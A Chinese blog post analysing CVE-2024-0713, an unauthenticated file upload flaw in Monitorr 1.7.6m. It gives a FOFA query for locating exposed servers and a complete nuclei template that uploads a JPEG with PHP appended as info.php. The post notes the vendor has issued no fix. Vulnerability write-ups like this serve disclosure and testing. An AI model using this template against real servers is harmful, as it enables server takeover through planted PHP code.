CVE-2024-0713 Monitorr 文件上传漏洞分析

最新推荐文章于 2024-04-23 18:52:22 发布
最新推荐文章于 2024-04-23 18:52:22 发布
阅读量503 收藏 6
点赞数 12
文章标签: eclipse java tomcat hibernate spring intellij-idea kafka
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39205521/article/details/135852352
版权

0x00 概述
Monitorr是一个自托管的PHP网络应用,可以监控本地和远程网络服务、网站和应用的状态。经过分析,该系统存在文件上传漏洞,攻击者可以通过该漏洞上传webshell至目标系统从而获取目标系统权限。

字段 值 备注
漏洞编号 CVE-2024-0713
漏洞厂商 Monitorr
厂商官网 https://github.com/Monitorr/Monitorr
影响对象类型 Web应用
影响产品 Monitorr
影响版本 Monitorr 1.7.6m
0x01 漏洞影响
影响版本Monitorr 1.7.6m

0x02 漏洞环境
该产品为开源产品:https://github.com/Monitorr/Monitorr

fofa 查询语句为:

body=“assets/php/timestamp.php”

0x03 漏洞验证和利用
先随便找一个图片,这里用python生成:

from PIL import Image

img = Image.new(‘RGB’, (1, 1), color = (0, 0, 0))
img.save(‘small.jpg’, ‘JPEG’)
然后在图片的末尾添加webshell

使用nuclei进行测试:

id: poc
info:
name: 直接上传文件
author: xxx
severity: high
description: 产品已经停止更新,影响全版本,直接文件上传
http:

  • raw:

    • |
      POST /assets/php/upload.php HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4)
      Accept-Encoding: gzip, deflate
      Accept: /
      Connection: close
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMmx988TUuintqO4Q
      Content-Length: 1194

      ------WebKitFormBoundaryMmx988TUuintqO4Q
      Content-Disposition: form-data; name=“fileToUpload”; filename=“info.php”
      Content-Type: image/jpeg

      {{base64_decode(“/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAABAAEDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD5/ooooA//2Tw/PXBocGluZm8oKTs/Pg==”)}}
      ------WebKitFormBoundaryMmx988TUuintqO4Q–
      unsafe: false
      cookie-reuse: false
      matchers-condition: or
      matchers:

    • type: word
      part: body
      words:

      • usrimg/info.php
        condition: or

0x04 漏洞分析
漏洞的位置在 assets\php\upload.php ,直接就是文件上传,唯一的检查是调用 getimagesize() 判断图片是否满足格式:

0x05 漏洞修复
该产品已经停止更新

互助小修项目总监任友
关注
  • 12
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Monitorr 任意文件上传漏洞复现(CVE-2024-0713)
0xSec
01-24 1069
Monitorr 1.7.6m 版本中发现漏洞。它已被宣布为关键。受此漏洞影响的是组件服务配置的文件 /assets/php/upload.php 的未知功能。对参数 fileToUpload 的操作会导致不受限制的上传,未经身份验证的攻击者可远程上传恶意文件导致服务器失陷。
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
通过升级openssh到OpenSSH8.4 修复openssh低版本的漏洞 openssh8.4需要的 openssl-1.1.1g, openssh-8.4p1,zlib-1.2.11
Error系列-CVE CIS-2023系统漏洞处理方案集合
tangdou369098655的博客
06-06 5709
网络安全-CVE - CIS 漏洞分析以及解决
CVE-2024-0713 Monitorr 服务配置 upload.php 无限制上传漏洞
白昼小丑的博客
02-27 634
## Monitorr是一个自托管的PHP网络应用,可以监控本地和远程网络服务、网站和应用的状态。经过分析,该系统存在文件上传漏洞,攻击者可以通过该漏洞上传webshell至目标系统从而获取目标系统权限。漏洞的位置在 assets\php\upload.php ,直接就是文件上传,唯一的检查是调用 getimagesize() 判断图片是否满足格式。
漏洞复现】Monitorr-upload-文件上传(CVE-2024-0713)
知黑而守白
01-25 119
Monitorr是一个实时显示任何网络应用程序或服务状态的网络前端。Monitorr upload 接口存在文件上传漏洞。未经身份认证的攻击者通过该漏洞上传恶意文件,可能导致恶意代码执行、身份伪造、后门植入、敏感数据泄露等问题。
TrafficMonitorr网速流量监控/CPU内存率查看工具
www_5438xiazai的博客
07-02 377
简介: Traffic Monitor (网络流量监控器) 是一款 Windows 平台上开源免费的实时网速监控软件。它体积小巧而且是绿色软件,能以类似 360 助手的「桌面悬浮窗」的形式,保持在桌面角落或嵌入到任务栏为你显示当前的网络速度(上传/下载速度),以及显示系统的 CPU 和内存利用率。 网盘下载地址: http://kekewl.net/Bqwog4sX3AL0 图片: ...
tracker服务器列表2020_它来了!微软2020年2月星期二补丁日修复99漏洞,含积极被利用IE零日远程攻击漏洞补丁...
weixin_39887748的博客
11-14 289
微软2020年2月星期二补丁日已发布,也是Windows 7用户第一次不会获得免费的安全更新。IT管理员忙碌的一天开始了。随着2020年2月安全更新的发布,Microsoft已发布Flash Player的一个公告,并修复了Microsoft产品中的99个补丁。在这些漏洞中,有10个被分类为危急,87个被分类为重要,2个被分类为中等。此次更新中包括一个针对CVE-2020-0674 In...
Tomcat任意文件读取 文件包含漏洞复现(CVE-2020-1938/CNVD-2020-10487)
jiji_king的博客
07-09 2090
个人笔记
CVE-2024-0352:Likeshop任意文件上传漏洞复现 [附POC]
薛定谔嘚喵博客
02-05 647
Likeshop 2.5.7.20210311及之前版本存在代码问题漏洞,该漏洞源于文件server/application/api/controller/File.php的参数file会导致不受限制的上传。
hadoop安装记录
crazy_rays的专栏
04-22 697
【代码】hadoop安装记录。
mybatisPlus使用MetaObjectHandler对字段进行更新
最新发布
m0_56356631的博客
04-23 332
都是符合我们的预期的。
string模拟实现
m0_73969414的博客
04-23 1439
c++中string的模拟实现,面试必会知识点
实现自定义注解、实现自定义幂等性注解
qq_44721738的博客
04-23 599
添加 Spring AOP 依赖。创建自定义注解。创建一个新的 Java 注解类,通过@interface关键字来定义,并可以添加元注解以及属性。@Target(ElementType.METHOD) //表示作用于方法上@Retention(RetentionPolicy.RUNTIME) // 表示这个注解在运行时是可见的,这样 AOP 代理才能在运行时读取到这个注解编写 AOP 拦截(自定义注解)的逻辑代码。@Aspect@Component// 方法执行前的处理。
javaweb-SpringBoot基础
kussm_的博客
04-20 1340
Spring的官网(Spring的简介:Spring makes Java simple。Spring Boot 可以帮助我们非常快速的构建应用程序、简化开发、提高效率。创建一个子包controller。
第5 章 Consul服务注册与发现
a13763926743的博客
04-22 757
consul官网地址。
cve-2024-0195
01-19
cve-2024-0195是一个已被公开的漏洞编号,通常用于标识特定的计算机安全漏洞。这个漏洞编号通常由安全研究人员或组织在发现并报告一个新漏洞时,给漏洞分配一个唯一的标识符。 在这种情况下,cve-2024-0195表示在2024年发现的第195个已知漏洞漏洞编号的目的是帮助用户和组织识别并补救安全漏洞,以保护其系统和数据免受潜在的攻击和损害。 对于普通用户来说,了解漏洞编号有助于他们更好地了解他们的系统或软件是否受到当前已知的漏洞威胁。对于技术人员和安全专家来说,漏洞编号可以帮助他们更有效地管理和防范潜在的安全风险。 总之,cve-2024-0195代表着一个已知的计算机安全漏洞,可能需要通过软件更新、修复补丁或其他安全措施来加以解决。因此,对于系统管理员和用户来说,了解并及时处理漏洞编号所代表的漏洞是非常重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

互助小修项目总监任友

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值